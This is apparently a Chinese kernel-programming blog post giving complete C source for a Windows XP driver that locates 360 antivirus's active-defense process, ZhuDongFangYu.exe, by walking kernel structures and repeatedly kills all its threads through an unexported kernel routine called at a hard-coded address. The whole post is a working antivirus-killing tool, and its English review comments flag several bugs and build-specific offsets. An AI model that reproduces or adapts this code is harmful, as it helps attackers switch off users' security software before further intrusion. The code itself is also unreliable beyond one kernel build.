WinXp下干翻360主动防御

#include <Ntifs.h>
// Kill 360 Defense
// Function prototype for PspTerminateThreadByPointer, an internal (non-exported) kernel
// routine. The pointer below is never resolved by name or by pattern: DriverEntry assigns
// it a literal address, so the call is only meaningful on the one kernel image that
// literal was read from — presumably a single Windows XP build, going by the page title
// (TODO confirm). On any other build the call lands in arbitrary code.
typedef NTSTATUS (*pPspTerminateThreadByPointer)(ULONG Thread/*address of the thread object to terminate*/,
       int ExitStatus, int DirectTerminate);
pPspTerminateThreadByPointer PspTerminateThreadByPointer;
// Strip the directory part of a path taken from _EPROCESS.SeAuditProcessCreationInfo.Name,
// leaving *Name pointing at the last path component (the image file name).
// Name: in/out pointer to a NUL-terminated CHAR string. On return *Name has been advanced
//       to the character after the last '\\' or '/'. No return value.
// NOTE(review): the loop condition compares the pointer *Name itself against '\0', not the
// character **Name it references, so the backward scan is bounded only by finding a
// separator; it relies on the input always containing one.
VOID StrSubProcessName(PCHAR * Name)
{
       ULONG NameLen = strlen(*Name);
       ULONG index = 0; // incremented per step but never read
       // Move to the terminating NUL, then scan backwards from there.
       (*Name) += NameLen;
       while (*Name != '\0')
       {
              // Is this character a '\\' or '/' separator?
              if (**Name == '\\' || **Name == '/')
              {
                     // Found one: the name starts right after it.
                     *Name = (*Name) + 1;
                     break;
              }
              (*Name)--;
              index++;
       }
}
// Look up a process by image name.
// Walks the active-process list and returns the EPROCESS address of the first match, or 0
// if none is found.
// ProcessName: NUL-terminated name to look for. The comparison is case-insensitive and
//              covers only strlen(ProcessName) characters, so it is a prefix match:
//              "foo" matches "foo.exe" as well as "foobar.exe".
// The KPCR/ApcState reads in the inline asm and the offsets 0x88 and 0x1f4 are raw
// literals, not taken from any header; they hold only for the kernel build they were
// measured on. The __asm block is 32-bit MSVC syntax. No lock is taken on the process
// list while it is walked, and the list entry whose Flink is the starting entry is never
// examined (the loop stops before it).
ULONG EnumGetTargetProcess(PCHAR ProcessName)
{
       CHAR Buffer[100] = { 0 };
       ANSI_STRING ANextProcessName;
       // Buffer only seeds the ANSI_STRING; the conversion below passes
       // AllocateDestinationString == TRUE and so allocates its own buffer, which is why
       // each iteration frees the string. Buffer itself never receives a name.
       RtlInitAnsiString(&ANextProcessName, Buffer);
       // KPCR.PrcbData.CurrentThread.ApcState.Process holds the current process's EPROCESS address
       ULONG CurrentEprocess = 0;
       __asm
       {
              mov eax, dword ptr fs : [0x124]; // KPCR.PrcbData.CurrentThread
              mov ecx, dword ptr[eax + 0x44]; // CurrentThread.ApcState.Process
              mov CurrentEprocess, ecx;
       }
       // _EPROCESS.ActiveProcessLinks links every active process in the system
       PLIST_ENTRY ProcessEntry = (PLIST_ENTRY)(CurrentEprocess + 0x88); //   ActiveProcessLinks
       PLIST_ENTRY CurrentProcessEntry = ProcessEntry;
       // Start at the current process and follow Flink until the next hop would return to the start.
       while (CurrentProcessEntry->Flink != ProcessEntry)
       {
              // Recover the EPROCESS base from the embedded list entry
              ULONG NextEprocess = (ULONG)CurrentProcessEntry - 0x88;
              // Process name: _EPROCESS.SeAuditProcessCreationInfo.Name (a UNICODE_STRING pointer at 0x1f4)
              PUNICODE_STRING NextProcessName =  (PUNICODE_STRING)(*(PULONG)(NextEprocess + 0x1f4));
              // Unicode -> ANSI; the return status is not checked
              RtlUnicodeStringToAnsiString(&ANextProcessName, NextProcessName,  TRUE);
              PCHAR Name = ANextProcessName.Buffer;
              StrSubProcessName(&Name);
              if (_strnicmp(Name, ProcessName, strlen(ProcessName)) == 0)
              {
                     RtlFreeAnsiString(&ANextProcessName);
                     // Match: return the EPROCESS base address
                     return NextEprocess;
              }
              RtlFreeAnsiString(&ANextProcessName);
              // Otherwise move to the next process
              CurrentProcessEntry = CurrentProcessEntry->Flink;
       }
       // Reaching here means the named process was not found
       return 0;
}
// Return the thread list entry to start enumerating a process's threads from.
// Eprocess: EPROCESS base address as returned by EnumGetTargetProcess.
// Reads the ULONG stored at offset 0x190 (labelled _EPROCESS.ThreadListHead by the original
// author; a raw literal valid only for one build) and returns it as a PLIST_ENTRY. Note it
// dereferences the field rather than taking its address, so the value handed back is the
// Flink stored in that field, not a pointer to the field itself.
PLIST_ENTRY GetThreadEntry(ULONG Eprocess)
{
       // _EPROCESS.ThreadListHead is the process's active thread list
       return (PLIST_ENTRY)(*(PULONG)(Eprocess + 0x190));
}
// Walk a thread list and call PspTerminateThreadByPointer on every thread in it.
// ThreadListEntry: list entry to start from (see GetThreadEntry). The entry whose Flink
//                  equals ThreadListEntry is never visited.
// Returns: always STATUS_SUCCESS. The return values of PspTerminateThreadByPointer are
//          discarded, so a failed termination is never reported to the caller.
// The offsets 0x22C (list entry -> thread object) and 0x220 (thread -> owning process) are
// raw literals for one kernel build. The comment on the first one says 0x1b0 while the
// code subtracts 0x22C, so the two disagree — treat both numbers as unverified.
NTSTATUS KillALLThread(PLIST_ENTRY ThreadListEntry)
{
       // The calling thread; it is passed a different DirectTerminate argument below
       PETHREAD Self = PsGetCurrentThread();
       PLIST_ENTRY CurrentListEntry = ThreadListEntry;
       NTSTATUS status = STATUS_SUCCESS; // never modified
       while (CurrentListEntry->Flink != ThreadListEntry)
       {
              // Thread object address from its embedded list entry (original note: ThreadListEntry 0x1b0)
              ULONG kthread = (ULONG)CurrentListEntry - 0x22C;
              // Owning process: ThreadsProcess at 0x220. This read happens before the range
              // check on kthread below, so an implausible entry is dereferenced before it is skipped.
              ULONG eprocess = *(PULONG)(kthread + 0x220);
              if (kthread < 0x80000000) goto Next; // presumably a user/kernel address split check — unverified
              if (!eprocess) goto Next;
              if ((ULONG)Self == kthread)
              {
                     // Our own thread: DirectTerminate == 1
                     PspTerminateThreadByPointer(kthread, 0, 1);
                     goto Next;
              }
              // Any other thread: DirectTerminate == 0
              PspTerminateThreadByPointer(kthread, 0, 0);
Next:
              CurrentListEntry = CurrentListEntry->Flink;
       }
       return status;
}
// Driver unload callback. Only emits a debug message ("driver unloaded"); nothing is
// torn down because nothing was allocated or registered beyond the unload routine itself.
// DriverObject: unused.
VOID Unload(PDRIVER_OBJECT DriverObject)
{
       DbgPrint("驱动卸载\n");
}
// Driver entry point.
// DriverObject: receives the unload routine. Regedit: registry path, unused.
// Sequence: (1) store the literal 0x805c9b02 as PspTerminateThreadByPointer — valid only
// for the exact kernel image it was read from; (2) look up the process whose image name
// starts with "ZhuDongFangYu.exe"; (3) if found, loop forever: wait 1 s, then terminate
// that process's threads.
// Eprocess is never updated inside the loop, so once the target is found DriverEntry
// never returns: the load request never completes and the loop runs on the loader's
// thread. STATUS_SUCCESS is returned only when the process was not found. From a
// defensive standpoint the observable behaviour is a third-party kernel driver load
// followed by repeated, once-per-second thread terminations against the named process.
NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING Regedit)
{
       //KdBreakPoint();
       DbgPrint("驱动加载\n"); // "driver loaded"
       NTSTATUS status = STATUS_SUCCESS;
       DriverObject->DriverUnload = Unload;
       // Hard-coded address of the internal routine; build-specific, not resolved at runtime
       PspTerminateThreadByPointer = (pPspTerminateThreadByPointer)0x805c9b02;
       // Locate the target process (prefix match, see EnumGetTargetProcess)
       ULONG Eprocess = EnumGetTargetProcess("ZhuDongFangYu.exe");
       // Negative value = relative delay in 100 ns units: 10,000,000 * 100 ns = 1 s
       LARGE_INTEGER timeOut = RtlConvertLongToLargeInteger(-10 * 1000 * 1000);
       while (Eprocess)
       {
              // Once per second, terminate the target's threads. Eprocess is not re-resolved,
              // so the loop keeps using the original address even after the process is gone.
              KeDelayExecutionThread(KernelMode, FALSE, &timeOut);
              PLIST_ENTRY ThreadListEntry = GetThreadEntry(Eprocess);
              KillALLThread(ThreadListEntry);
       }
       return status;
}

原创文章,转载请注明: 转载自Windows内核安全驱动编程
